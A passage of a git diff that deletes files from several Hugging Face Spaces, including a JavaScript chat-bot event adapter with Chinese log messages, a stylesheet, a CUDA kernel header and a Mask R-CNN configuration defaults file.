logger.info(`${logger.blue(`[${data.self_id}]`)} 群成员减少:[${data.group_id}, 
${data.operator_id}=>${data.user_id}] ${data.sub_type}`) - if (data.user_id == data.self_id) - data.bot.getGroupMap() - break - case "group_admin": - logger.info(`${logger.blue(`[${data.self_id}]`)} 群管理员变动:[${data.group_id}, ${data.user_id}] ${data.sub_type}`) - data.set = data.sub_type == "set" - break - case "group_upload": - logger.info(`${logger.blue(`[${data.self_id}]`)} 群文件上传:[${data.group_id}, ${data.user_id}] ${JSON.stringify(data.file)}`) - break - case "group_ban": - logger.info(`${logger.blue(`[${data.self_id}]`)} 群禁言:[${data.group_id}, ${data.operator_id}=>${data.user_id}] ${data.sub_type} ${data.duration}秒`) - break - case "friend_add": - logger.info(`${logger.blue(`[${data.self_id}]`)} 好友添加:[${data.user_id}]`) - data.bot.getFriendMap() - break - case "notify": - if (data.group_id) - data.notice_type = "group" - else - data.notice_type = "friend" - switch (data.sub_type) { - case "poke": - data.operator_id = data.user_id - if (data.group_id) - logger.info(`${logger.blue(`[${data.self_id}]`)} 群戳一戳:[${data.group_id}, ${data.operator_id}=>${data.target_id}]`) - else - logger.info(`${logger.blue(`[${data.self_id}]`)} 好友戳一戳:[${data.operator_id}=>${data.target_id}]`) - break - case "honor": - logger.info(`${logger.blue(`[${data.self_id}]`)} 群荣誉:[${data.group_id}, ${data.user_id}] ${data.honor_type}`) - break - case "title": - logger.info(`${logger.blue(`[${data.self_id}]`)} 群头衔:[${data.group_id}, ${data.user_id}] ${data.title}`) - break - default: - logger.warn(`${logger.blue(`[${data.self_id}]`)} 未知通知:${logger.magenta(JSON.stringify(data))}`) - } - break - case "group_card": - logger.info(`${logger.blue(`[${data.self_id}]`)} 群名片更新:[${data.group_id}, ${data.user_id}] ${data.card_old}=>${data.card_new}`) - break - case "offline_file": - logger.info(`${logger.blue(`[${data.self_id}]`)} 离线文件:[${data.user_id}] ${JSON.stringify(data.file)}`) - break - case "client_status": - logger.info(`${logger.blue(`[${data.self_id}]`)} 客户端${data.online ? 
"上线" : "下线"}:${JSON.stringify(data.client)}`) - data.clients = (await data.bot.sendApi("get_online_clients")).clients - data.bot.clients = data.clients - break - case "essence": - data.notice_type = "group_essence" - logger.info(`${logger.blue(`[${data.self_id}]`)} 群精华消息:[${data.group_id}, ${data.operator_id}=>${data.sender_id}] ${data.sub_type} ${data.message_id}`) - break - case "guild_channel_recall": - logger.info(`${logger.blue(`[${data.self_id}]`)} 频道消息撤回:[${data.guild_id}-${data.channel_id}, ${data.operator_id}=>${data.user_id}] ${data.message_id}`) - break - case "message_reactions_updated": - data.notice_type = "guild_message_reactions_updated" - logger.info(`${logger.blue(`[${data.self_id}]`)} 频道消息表情贴:[${data.guild_id}-${data.channel_id}, ${data.user_id}] ${data.message_id} ${JSON.stringify(data.current_reactions)}`) - break - case "channel_updated": - data.notice_type = "guild_channel_updated" - logger.info(`${logger.blue(`[${data.self_id}]`)} 子频道更新:[${data.guild_id}-${data.channel_id}, ${data.user_id}] ${JSON.stringify(data.old_info)}=>${JSON.stringify(data.new_info)}`) - break - case "channel_created": - data.notice_type = "guild_channel_created" - logger.info(`${logger.blue(`[${data.self_id}]`)} 子频道创建:[${data.guild_id}-${data.channel_id}, ${data.user_id}] ${JSON.stringify(data.channel_info)}`) - data.bot.getGroupMap() - break - case "channel_destroyed": - data.notice_type = "guild_channel_destroyed" - logger.info(`${logger.blue(`[${data.self_id}]`)} 子频道删除:[${data.guild_id}-${data.channel_id}, ${data.user_id}] ${JSON.stringify(data.channel_info)}`) - data.bot.getGroupMap() - break - default: - logger.warn(`${logger.blue(`[${data.self_id}]`)} 未知通知:${logger.magenta(JSON.stringify(data))}`) - } - - let notice = data.notice_type.split("_") - data.notice_type = notice.shift() - notice = notice.join("_") - if (notice) - data.sub_type = notice - - if (data.guild_id && data.channel_id) { - data.group_id = `${data.guild_id}-${data.channel_id}` - Object.defineProperty(data, "friend", { get() { return this.member || {}}}) - } - - Bot.em(`${data.post_type}.${data.notice_type}.${data.sub_type}`, data) - } - - makeRequest(data) { - switch (data.request_type) { - case "friend": - logger.info(`${logger.blue(`[${data.self_id}]`)} 加好友请求:[${data.user_id}] ${data.comment}(${data.flag})`) - data.sub_type = "add" - data.approve = approve => data.bot.setFriendAddRequest(data.flag, approve) - break - case "group": - logger.info(`${logger.blue(`[${data.self_id}]`)} 加群请求:[${data.group_id}, ${data.user_id}] ${data.sub_type} ${data.comment}(${data.flag})`) - data.approve = approve => data.bot.setGroupAddRequest(data.flag, data.sub_type, approve) - break - default: - logger.warn(`${logger.blue(`[${data.self_id}]`)} 未知请求:${logger.magenta(JSON.stringify(data))}`) - } - - data.bot.request_list.push(data) - Bot.em(`${data.post_type}.${data.request_type}.${data.sub_type}`, data) - } - - heartbeat(data) { - if (data.status?.stat) - data.bot.stat = { - ...data.status, - lost_pkt_cnt: data.status.stat.packet_lost, - lost_times: data.status.stat.lost_times, - recv_msg_cnt: data.status.stat.message_received, - recv_pkt_cnt: data.status.stat.packet_received, - sent_msg_cnt: data.status.stat.message_sent, - sent_pkt_cnt: data.status.stat.packet_sent, - start_time: data.bot.stat.start_time, - } - } - - makeMeta(data, ws) { - switch (data.meta_event_type) { - case "heartbeat": - this.heartbeat(data) - break - case "lifecycle": - this.connect(data, ws) - break - default: - 
logger.warn(`${logger.blue(`[${data.self_id}]`)} 未知消息:${logger.magenta(JSON.stringify(data))}`) - } - } - - message(data, ws) { - try { - data = JSON.parse(data) - } catch (err) { - return logger.error(`解码数据失败:${logger.red(err)}`) - } - - if (data.post_type) { - if (data.meta_event_type != "lifecycle" && !Bot.uin.includes(data.self_id)) { - logger.warn(`${logger.blue(`[${data.self_id}]`)} 找不到对应Bot,忽略消息:${logger.magenta(JSON.stringify(data))}`) - return false - } - data.bot = Bot[data.self_id] - - switch (data.post_type) { - case "meta_event": - this.makeMeta(data, ws) - break - case "message": - this.makeMessage(data) - break - case "notice": - this.makeNotice(data) - break - case "request": - this.makeRequest(data) - break - case "message_sent": - data.post_type = "message" - this.makeMessage(data) - break - default: - logger.warn(`${logger.blue(`[${data.self_id}]`)} 未知消息:${logger.magenta(JSON.stringify(data))}`) - } - } else if (data.echo) { - Bot.emit(data.echo, data) - } else { - logger.warn(`${logger.blue(`[${data.self_id}]`)} 未知消息:${logger.magenta(JSON.stringify(data))}`) - } - } - - load() { - if (!Array.isArray(Bot.wsf[this.path])) - Bot.wsf[this.path] = [] - Bot.wsf[this.path].push((ws, ...args) => - ws.on("message", data => this.message(data, ws, ...args)) - ) - } -}) \ No newline at end of file diff --git a/spaces/CobaltZvc/Hyper_Bot/style.css b/spaces/CobaltZvc/Hyper_Bot/style.css deleted file mode 100644 index 114adf441e9032febb46bc056b2a8bb651075f0d..0000000000000000000000000000000000000000 --- a/spaces/CobaltZvc/Hyper_Bot/style.css +++ /dev/null @@ -1,28 +0,0 @@ -body { - padding: 2rem; - font-family: -apple-system, BlinkMacSystemFont, "Arial", sans-serif; -} - -h1 { - font-size: 16px; - margin-top: 0; -} - -p { - color: rgb(107, 114, 128); - font-size: 15px; - margin-bottom: 10px; - margin-top: 5px; -} - -.card { - max-width: 620px; - margin: 0 auto; - padding: 16px; - border: 1px solid lightgray; - border-radius: 16px; -} - -.card p:last-child { - margin-bottom: 0; -} diff --git a/spaces/CofAI/netlist/index.html b/spaces/CofAI/netlist/index.html deleted file mode 100644 index 15388ffe25e26693f2232ba80adc6f0d2caa5700..0000000000000000000000000000000000000000 --- a/spaces/CofAI/netlist/index.html +++ /dev/null @@ -1,12 +0,0 @@ - - NetList - - - - - - - - - \ No newline at end of file diff --git a/spaces/CorvaeOboro/gen_ability_icon/torch_utils/ops/bias_act.h b/spaces/CorvaeOboro/gen_ability_icon/torch_utils/ops/bias_act.h deleted file mode 100644 index a32187e1fb7e3bae509d4eceaf900866866875a4..0000000000000000000000000000000000000000 --- a/spaces/CorvaeOboro/gen_ability_icon/torch_utils/ops/bias_act.h +++ /dev/null @@ -1,38 +0,0 @@ -// Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved. -// -// NVIDIA CORPORATION and its licensors retain all intellectual property -// and proprietary rights in and to this software, related documentation -// and any modifications thereto. Any use, reproduction, disclosure or -// distribution of this software and related documentation without an express -// license agreement from NVIDIA CORPORATION is strictly prohibited. - -//------------------------------------------------------------------------ -// CUDA kernel parameters. 
- -struct bias_act_kernel_params -{ - const void* x; // [sizeX] - const void* b; // [sizeB] or NULL - const void* xref; // [sizeX] or NULL - const void* yref; // [sizeX] or NULL - const void* dy; // [sizeX] or NULL - void* y; // [sizeX] - - int grad; - int act; - float alpha; - float gain; - float clamp; - - int sizeX; - int sizeB; - int stepB; - int loopX; -}; - -//------------------------------------------------------------------------ -// CUDA kernel selection. - -template void* choose_bias_act_kernel(const bias_act_kernel_params& p); - -//------------------------------------------------------------------------ diff --git a/spaces/Curranj/GPT-SQL/README.md b/spaces/Curranj/GPT-SQL/README.md deleted file mode 100644 index ae8932ce98d6665219909798f8bc8e59707cda81..0000000000000000000000000000000000000000 --- a/spaces/Curranj/GPT-SQL/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: GPT SQL -emoji: 💻 -colorFrom: purple -colorTo: blue -sdk: gradio -sdk_version: 3.16.2 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/Cyril666/ContourNet-ABI/maskrcnn_benchmark/config/defaults.py b/spaces/Cyril666/ContourNet-ABI/maskrcnn_benchmark/config/defaults.py deleted file mode 100644 index aa35ac474b5d42a99361d1ac5ba2d8e164ae0a2c..0000000000000000000000000000000000000000 --- a/spaces/Cyril666/ContourNet-ABI/maskrcnn_benchmark/config/defaults.py +++ /dev/null @@ -1,471 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved. -import os - -from yacs.config import CfgNode as CN - - -# ----------------------------------------------------------------------------- -# Convention about Training / Test specific parameters -# ----------------------------------------------------------------------------- -# Whenever an argument can be either used for training or for testing, the -# corresponding name will be post-fixed by a _TRAIN for a training parameter, -# or _TEST for a test-specific parameter. -# For example, the number of images during training will be -# IMAGES_PER_BATCH_TRAIN, while the number of images for testing will be -# IMAGES_PER_BATCH_TEST - -# ----------------------------------------------------------------------------- -# Config definition -# ----------------------------------------------------------------------------- - -_C = CN() - -_C.MODEL = CN() -_C.MODEL.RPN_ONLY = False -_C.MODEL.MASK_ON = False -_C.MODEL.FCOS_ON = False -_C.MODEL.KE_ON = False -_C.MODEL.BOUNDARY_ON = False -_C.MODEL.MSR_ON = False -_C.MODEL.RETINANET_ON = False -_C.MODEL.KEYPOINT_ON = False -_C.MODEL.DEVICE = "cuda" -_C.MODEL.META_ARCHITECTURE = "GeneralizedRCNN" -_C.MODEL.CLS_AGNOSTIC_BBOX_REG = False - -# If the WEIGHT starts with a catalog://, like :R-50, the code will look for -# the path in paths_catalog. 
Else, it will use it as the specified absolute -# path -_C.MODEL.WEIGHT = "" - - -# ----------------------------------------------------------------------------- -# INPUT -# ----------------------------------------------------------------------------- -_C.INPUT = CN() -# Size of the smallest side of the image during training -_C.INPUT.MIN_SIZE_TRAIN = (800,) # (800,) -# The range of the smallest side for multi-scale training -_C.INPUT.MIN_SIZE_RANGE_TRAIN = (-1, -1) # -1 means disabled and it will use MIN_SIZE_TRAIN -# Maximum size of the side of the image during training -_C.INPUT.MAX_SIZE_TRAIN = 1333 -# Size of the smallest side of the image during testing -_C.INPUT.MIN_SIZE_TEST = 1000 -# Maximum size of the side of the image during testing -_C.INPUT.MAX_SIZE_TEST = 1333 -# Values to be used for image normalization -_C.INPUT.PIXEL_MEAN = [102.9801, 115.9465, 122.7717] -# Values to be used for image normalization -_C.INPUT.PIXEL_STD = [1., 1., 1.] -# Convert image to BGR format (for Caffe2 models), in range 0-255 -_C.INPUT.TO_BGR255 = True -_C.INPUT.CROP_PROB_TRAIN = 1.0 -_C.INPUT.ROTATE_PROB_TRAIN = 0.3 -_C.INPUT.ROTATE_DEGREE = (0,15,-15,45,-45,90,-90) -# _C.INPUT.ROTATE_DEGREE = 15 - - - - -# ----------------------------------------------------------------------------- -# Dataset -# ----------------------------------------------------------------------------- -_C.DATASETS = CN() -# List of the dataset names for training, as present in paths_catalog.py -_C.DATASETS.TRAIN = () -# List of the dataset names for testing, as present in paths_catalog.py -_C.DATASETS.TEST = () -_C.DATASETS.Test_Visual = False -# ----------------------------------------------------------------------------- -# DataLoader -# ----------------------------------------------------------------------------- -_C.DATALOADER = CN() -# Number of data loading threads -_C.DATALOADER.NUM_WORKERS = 4 -# If > 0, this enforces that each collated batch should have a size divisible -# by SIZE_DIVISIBILITY -_C.DATALOADER.SIZE_DIVISIBILITY = 0 -# If True, each batch should contain only images for which the aspect ratio -# is compatible. This groups portrait images together, and landscape images -# are not batched with portrait images. 
-_C.DATALOADER.ASPECT_RATIO_GROUPING = True - - -# ---------------------------------------------------------------------------- # -# Backbone options -# ---------------------------------------------------------------------------- # -_C.MODEL.BACKBONE = CN() - -# The backbone conv body to use -# The string must match a function that is imported in modeling.model_builder -# (e.g., 'FPN.add_fpn_ResNet101_conv5_body' to specify a ResNet-101-FPN -# backbone) -_C.MODEL.BACKBONE.CONV_BODY = "R-50-C4" - -# Add StopGrad at a specified stage so the bottom layers are frozen -_C.MODEL.BACKBONE.FREEZE_CONV_BODY_AT = 2 -# GN for backbone - -##123123123 -_C.MODEL.BACKBONE.USE_GN = False - - -# ---------------------------------------------------------------------------- # -# FPN options -# ---------------------------------------------------------------------------- # -_C.MODEL.FPN = CN() - -# 123123123 -_C.MODEL.FPN.USE_GN = False -_C.MODEL.FPN.USE_RELU = False - -#############123123123 -_C.MODEL.FPN.USE_DEFORMABLE = False - - -# ---------------------------------------------------------------------------- # -# Group Norm options -# ---------------------------------------------------------------------------- # -_C.MODEL.GROUP_NORM = CN() -# Number of dimensions per group in GroupNorm (-1 if using NUM_GROUPS) -_C.MODEL.GROUP_NORM.DIM_PER_GP = -1 -# Number of groups in GroupNorm (-1 if using DIM_PER_GP) -_C.MODEL.GROUP_NORM.NUM_GROUPS = 32 -# GroupNorm's small constant in the denominator -_C.MODEL.GROUP_NORM.EPSILON = 1e-5 - - -# ---------------------------------------------------------------------------- # -# RPN options -# ---------------------------------------------------------------------------- # -_C.MODEL.RPN = CN() -_C.MODEL.RPN.USE_FPN = False -# Base RPN anchor sizes given in absolute pixels w.r.t. the scaled network input -_C.MODEL.RPN.ANCHOR_SIZES = (32, 64, 128, 256, 512) -# Stride of the feature map that RPN is attached. -# For FPN, number of strides should match number of scales -_C.MODEL.RPN.ANCHOR_STRIDE = (16,) -# RPN anchor aspect ratios -_C.MODEL.RPN.ASPECT_RATIOS = (0.5, 1.0, 2.0) -# Remove RPN anchors that go outside the image by RPN_STRADDLE_THRESH pixels -# Set to -1 or a large value, e.g. 
100000, to disable pruning anchors -_C.MODEL.RPN.STRADDLE_THRESH = 0 -# Minimum overlap required between an anchor and ground-truth box for the -# (anchor, gt box) pair to be a positive example (IoU >= FG_IOU_THRESHOLD -# ==> positive RPN example) -_C.MODEL.RPN.FG_IOU_THRESHOLD = 0.7 -# Maximum overlap allowed between an anchor and ground-truth box for the -# (anchor, gt box) pair to be a negative examples (IoU < BG_IOU_THRESHOLD -# ==> negative RPN example) -_C.MODEL.RPN.BG_IOU_THRESHOLD = 0.3 -# Total number of RPN examples per image -_C.MODEL.RPN.BATCH_SIZE_PER_IMAGE = 256 -# Target fraction of foreground (positive) examples per RPN minibatch -_C.MODEL.RPN.POSITIVE_FRACTION = 0.5 -# Number of top scoring RPN proposals to keep before applying NMS -# When FPN is used, this is *per FPN level* (not total) -_C.MODEL.RPN.PRE_NMS_TOP_N_TRAIN = 12000 - -_C.MODEL.RPN.PRE_NMS_TOP_N_TEST = 6000 -# Number of top scoring RPN proposals to keep after applying NMS -_C.MODEL.RPN.POST_NMS_TOP_N_TRAIN = 2000 -_C.MODEL.RPN.POST_NMS_TOP_N_TEST = 1000 -# NMS threshold used on RPN proposals -_C.MODEL.RPN.NMS_THRESH = 0.7 -# Proposal height and width both need to be greater than RPN_MIN_SIZE -# (a the scale used during training or inference) -_C.MODEL.RPN.MIN_SIZE = 0 -# Number of top scoring RPN proposals to keep after combining proposals from -# all FPN levels -_C.MODEL.RPN.FPN_POST_NMS_TOP_N_TRAIN = 2000 -_C.MODEL.RPN.FPN_POST_NMS_TOP_N_TEST = 2000 -# Custom rpn head, empty to use default conv or separable conv -_C.MODEL.RPN.RPN_HEAD = "SingleConvRPNHead_1" - - -# ---------------------------------------------------------------------------- # -# ROI HEADS options -# ---------------------------------------------------------------------------- # -_C.MODEL.ROI_HEADS = CN() -_C.MODEL.ROI_HEADS.USE_FPN = False -_C.MODEL.ROI_HEADS.USE_FPN = False -# Overlap threshold for an RoI to be considered foreground (if >= FG_IOU_THRESHOLD) -_C.MODEL.ROI_HEADS.FG_IOU_THRESHOLD = 0.5 -# Overlap threshold for an RoI to be considered background -# (class = 0 if overlap in [0, BG_IOU_THRESHOLD)) -_C.MODEL.ROI_HEADS.BG_IOU_THRESHOLD = 0.5 -# Default weights on (dx, dy, dw, dh) for normalizing bbox regression targets -# These are empirically chosen to approximately lead to unit variance targets -_C.MODEL.ROI_HEADS.BBOX_REG_WEIGHTS = (10., 10., 5., 5.) -# RoI minibatch size *per image* (number of regions of interest [ROIs]) -# Total number of RoIs per training minibatch = -# TRAIN.BATCH_SIZE_PER_IM * TRAIN.IMS_PER_BATCH -# E.g., a common configuration is: 512 * 2 * 8 = 8192 -_C.MODEL.ROI_HEADS.BATCH_SIZE_PER_IMAGE = 512 -# Target fraction of RoI minibatch that is labeled foreground (i.e. 
class > 0) -_C.MODEL.ROI_HEADS.POSITIVE_FRACTION = 0.25 - -# Only used on test mode - -# Minimum score threshold (assuming scores in a [0, 1] range); a value chosen to -# balance obtaining high recall with not having too many low precision -# detections that will slow down inference post processing steps (like NMS) -_C.MODEL.ROI_HEADS.SCORE_THRESH = 0.05 -# Overlap threshold used for non-maximum suppression (suppress boxes with -# IoU >= this threshold) -_C.MODEL.ROI_HEADS.NMS = 0.5 -# Maximum number of detections to return per image (100 is based on the limit established for the COCO dataset) -_C.MODEL.ROI_HEADS.DETECTIONS_PER_IMG = 100 - - -_C.MODEL.ROI_BOX_HEAD = CN() -_C.MODEL.ROI_BOX_HEAD.FEATURE_EXTRACTOR = "ResNet50Conv5ROIFeatureExtractor" -_C.MODEL.ROI_BOX_HEAD.PREDICTOR = "FastRCNNPredictor" -_C.MODEL.ROI_BOX_HEAD.POOLER_RESOLUTION = 14 -_C.MODEL.ROI_BOX_HEAD.POOLER_SAMPLING_RATIO = 0 -_C.MODEL.ROI_BOX_HEAD.POOLER_SCALES = (1.0 / 16,) -_C.MODEL.ROI_BOX_HEAD.NUM_CLASSES = 81 -# Hidden layer dimension when using an MLP for the RoI box head -_C.MODEL.ROI_BOX_HEAD.MLP_HEAD_DIM = 1024 -# GN -#####123123123 -_C.MODEL.ROI_BOX_HEAD.USE_GN = False -# Dilation -_C.MODEL.ROI_BOX_HEAD.DILATION = 1 -_C.MODEL.ROI_BOX_HEAD.CONV_HEAD_DIM = 256 - -#### 123123 -_C.MODEL.ROI_BOX_HEAD.NUM_STACKED_CONVS = 4 -_C.MODEL.ROI_BOX_HEAD.CLASS_WEIGHT = 0.1 -_C.MODEL.ROI_BOX_HEAD.DEFORMABLE_POOLING = False - -_C.MODEL.ROI_MASK_HEAD = CN() -# Whether or not resize and translate masks to the input image. -_C.MODEL.ROI_MASK_HEAD.POSTPROCESS_MASKS = False -_C.MODEL.ROI_MASK_HEAD.POSTPROCESS_MASKS_THRESHOLD = 0.5 -_C.MODEL.ROI_MASK_HEAD.DILATION = 1 -_C.MODEL.ROI_MASK_HEAD.USE_GN = False - -# Boundary edge -_C.MODEL.ROI_BOUNDARY_HEAD = CN() -_C.MODEL.ROI_BOUNDARY_HEAD.DEFORMABLE_POOLING = False - -_C.MODEL.ROI_BOUNDARY_HEAD.FEATURE_EXTRACTOR = "ResNet50Conv5ROIFeatureExtractor" -_C.MODEL.ROI_BOUNDARY_HEAD.POOLER_RESOLUTION = 14 -_C.MODEL.ROI_BOUNDARY_HEAD.POOLER_SCALES = (1.0 / 16,) -_C.MODEL.ROI_BOUNDARY_HEAD.POOLER_SAMPLING_RATIO = 0 -_C.MODEL.ROI_BOUNDARY_HEAD.CONV_LAYERS = (256, 256, 256, 256) - -_C.MODEL.ROI_BOUNDARY_HEAD.PREDICTOR = "KERCNNC4Predictor" -_C.MODEL.ROI_BOUNDARY_HEAD.RESOLUTION = 14 -_C.MODEL.ROI_BOUNDARY_HEAD.SHARE_BOX_FEATURE_EXTRACTOR = True -_C.MODEL.ROI_BOUNDARY_HEAD.BO_WEIGHT = 1.0 -_C.MODEL.ROI_BOUNDARY_HEAD.Loss_balance = 1.2 - -# ---------------------------------------------------------------------------- # -# ResNe[X]t options (ResNets = {ResNet, ResNeXt} -# Note that parts of a resnet may be used for both the backbone and the head -# These options apply to both -# ---------------------------------------------------------------------------- # -_C.MODEL.RESNETS = CN() - -# Number of groups to use; 1 ==> ResNet; > 1 ==> ResNeXt -_C.MODEL.RESNETS.NUM_GROUPS = 1 - -# Baseline width of each group -_C.MODEL.RESNETS.WIDTH_PER_GROUP = 64 - -# Place the stride 2 conv on the 1x1 filter -# Use True only for the original MSRA ResNet; use False for C2 and Torch models -_C.MODEL.RESNETS.STRIDE_IN_1X1 = True - -# Residual transformation function -_C.MODEL.RESNETS.TRANS_FUNC = "BottleneckWithFixedBatchNorm" -_C.MODEL.RESNETS.DEF_FUNC = "DeformableConvWithFixedBatchNorm" -# ResNet's stem function (conv1 and pool1) -_C.MODEL.RESNETS.STEM_FUNC = "StemWithFixedBatchNorm" -_C.MODEL.RESNETS.DEF_START_MODULE = "NA" - -#########123123123 -_C.MODEL.RESNETS.DEFORM_POOLING = False - -# Apply dilation in stage "res5" -_C.MODEL.RESNETS.RES5_DILATION = 1 - -_C.MODEL.RESNETS.BACKBONE_OUT_CHANNELS = 256 * 4 
-_C.MODEL.RESNETS.RES2_OUT_CHANNELS = 256 -_C.MODEL.RESNETS.STEM_OUT_CHANNELS = 64 - -# ---------------------------------------------------------------------------- # -# FCOS Options -# ---------------------------------------------------------------------------- # -_C.MODEL.FCOS = CN() -_C.MODEL.FCOS.NUM_CLASSES = 81 # the number of classes including background -_C.MODEL.FCOS.FPN_STRIDES = [8, 16, 32, 64, 128] -_C.MODEL.FCOS.PRIOR_PROB = 0.01 -_C.MODEL.FCOS.INFERENCE_TH = 0.05 -_C.MODEL.FCOS.NMS_TH = 0.4 -_C.MODEL.FCOS.PRE_NMS_TOP_N = 1000 - -# Focal loss parameter: alpha -_C.MODEL.FCOS.LOSS_ALPHA = 0.25 -# Focal loss parameter: gamma -_C.MODEL.FCOS.LOSS_GAMMA = 2.0 -_C.MODEL.FCOS.SIZES_OF_INTEREST = [64, 128, 256, 512] - -# the number of convolutions used in the cls and bbox tower -_C.MODEL.FCOS.NUM_CONVS = 4 - -# ---------------------------------------------------------------------------- # -# RetinaNet Options (Follow the Detectron version) -# ---------------------------------------------------------------------------- # -_C.MODEL.RETINANET = CN() - -# This is the number of foreground classes and background. -_C.MODEL.RETINANET.NUM_CLASSES = 81 - -# Anchor aspect ratios to use -_C.MODEL.RETINANET.ANCHOR_SIZES = (32, 64, 128, 256, 512) -_C.MODEL.RETINANET.ASPECT_RATIOS = (0.5, 1.0, 2.0) -_C.MODEL.RETINANET.ANCHOR_STRIDES = (8, 16, 32, 64, 128) -_C.MODEL.RETINANET.STRADDLE_THRESH = 0 - -# Anchor scales per octave -_C.MODEL.RETINANET.OCTAVE = 2.0 -_C.MODEL.RETINANET.SCALES_PER_OCTAVE = 3 - -# Use C5 or P5 to generate P6 -_C.MODEL.RETINANET.USE_C5 = True - -# Convolutions to use in the cls and bbox tower -# NOTE: this doesn't include the last conv for logits -_C.MODEL.RETINANET.NUM_CONVS = 4 - -# Weight for bbox_regression loss -_C.MODEL.RETINANET.BBOX_REG_WEIGHT = 4.0 - -# Smooth L1 loss beta for bbox regression -_C.MODEL.RETINANET.BBOX_REG_BETA = 0.11 - -# During inference, #locs to select based on cls score before NMS is performed -# per FPN level -_C.MODEL.RETINANET.PRE_NMS_TOP_N = 1000 - -# IoU overlap ratio for labeling an anchor as positive -# Anchors with >= iou overlap are labeled positive -_C.MODEL.RETINANET.FG_IOU_THRESHOLD = 0.5 - -# IoU overlap ratio for labeling an anchor as negative -# Anchors with < iou overlap are labeled negative -_C.MODEL.RETINANET.BG_IOU_THRESHOLD = 0.4 - -# Focal loss parameter: alpha -_C.MODEL.RETINANET.LOSS_ALPHA = 0.25 - -# Focal loss parameter: gamma -_C.MODEL.RETINANET.LOSS_GAMMA = 2.0 - -# Prior prob for the positives at the beginning of training. 
This is used to set -# the bias init for the logits layer -_C.MODEL.RETINANET.PRIOR_PROB = 0.01 - -# Inference cls score threshold, anchors with score > INFERENCE_TH are -# considered for inference -_C.MODEL.RETINANET.INFERENCE_TH = 0.05 - -# NMS threshold used in RetinaNet -_C.MODEL.RETINANET.NMS_TH = 0.4 - - -# ---------------------------------------------------------------------------- # -# FBNet options -# ---------------------------------------------------------------------------- # -_C.MODEL.FBNET = CN() -_C.MODEL.FBNET.ARCH = "default" -# custom arch -_C.MODEL.FBNET.ARCH_DEF = "" -_C.MODEL.FBNET.BN_TYPE = "bn" -_C.MODEL.FBNET.SCALE_FACTOR = 1.0 -# the output channels will be divisible by WIDTH_DIVISOR -_C.MODEL.FBNET.WIDTH_DIVISOR = 1 -_C.MODEL.FBNET.DW_CONV_SKIP_BN = True -_C.MODEL.FBNET.DW_CONV_SKIP_RELU = True - -# > 0 scale, == 0 skip, < 0 same dimension -_C.MODEL.FBNET.DET_HEAD_LAST_SCALE = 1.0 -_C.MODEL.FBNET.DET_HEAD_BLOCKS = [] -# overwrite the stride for the head, 0 to use original value -_C.MODEL.FBNET.DET_HEAD_STRIDE = 0 - -# > 0 scale, == 0 skip, < 0 same dimension -_C.MODEL.FBNET.KPTS_HEAD_LAST_SCALE = 0.0 -_C.MODEL.FBNET.KPTS_HEAD_BLOCKS = [] -# overwrite the stride for the head, 0 to use original value -_C.MODEL.FBNET.KPTS_HEAD_STRIDE = 0 - -# > 0 scale, == 0 skip, < 0 same dimension -_C.MODEL.FBNET.MASK_HEAD_LAST_SCALE = 0.0 -_C.MODEL.FBNET.MASK_HEAD_BLOCKS = [] -# overwrite the stride for the head, 0 to use original value -_C.MODEL.FBNET.MASK_HEAD_STRIDE = 0 - -# 0 to use all blocks defined in arch_def -_C.MODEL.FBNET.RPN_HEAD_BLOCKS = 0 -_C.MODEL.FBNET.RPN_BN_TYPE = "" - - -# ---------------------------------------------------------------------------- # -# Solver -# ---------------------------------------------------------------------------- # -_C.SOLVER = CN() -_C.SOLVER.MAX_ITER = 40000 - -_C.SOLVER.BASE_LR = 0.001 -_C.SOLVER.BIAS_LR_FACTOR = 2 - -_C.SOLVER.MOMENTUM = 0.9 - -_C.SOLVER.WEIGHT_DECAY = 0.0005 -_C.SOLVER.WEIGHT_DECAY_BIAS = 0 - -_C.SOLVER.GAMMA = 0.1 -_C.SOLVER.STEPS = (30000,) - -_C.SOLVER.WARMUP_FACTOR = 1.0 / 3 -_C.SOLVER.WARMUP_ITERS = 500 -_C.SOLVER.WARMUP_METHOD = "linear" - -_C.SOLVER.CHECKPOINT_PERIOD = 2500 - -# Number of images per batch -# This is global, so if we have 8 GPUs and IMS_PER_BATCH = 16, each GPU will -# see 2 images per batch -_C.SOLVER.IMS_PER_BATCH = 4 - -# ---------------------------------------------------------------------------- # -# Specific test options -# ---------------------------------------------------------------------------- # -_C.TEST = CN() -_C.TEST.EXPECTED_RESULTS = [] -_C.TEST.EXPECTED_RESULTS_SIGMA_TOL = 4 -# Number of images per batch -# This is global, so if we have 8 GPUs and IMS_PER_BATCH = 16, each GPU will -# see 2 images per batch -_C.TEST.IMS_PER_BATCH = 16 -# Number of detections per image -_C.TEST.DETECTIONS_PER_IMG = 100 - - -# ---------------------------------------------------------------------------- # -# Misc options -# ---------------------------------------------------------------------------- # -_C.OUTPUT_DIR = "./1" -_C.IS_LOAD_OPTIMIZER = True -_C.IS_LOAD_SCHEDULER = True -_C.PROCESS = CN() - -#####123123123 -_C.PROCESS.PNMS = False -_C.PROCESS.NMS_THRESH = 0.4 - -_C.PATHS_CATALOG = os.path.join(os.path.dirname(__file__), "paths_catalog.py") diff --git a/spaces/DGSpitzer/TXT-2-IMG-2-MUSIC-2-VIDEO-w-RIFFUSION/utils.py b/spaces/DGSpitzer/TXT-2-IMG-2-MUSIC-2-VIDEO-w-RIFFUSION/utils.py deleted file mode 100644 index 
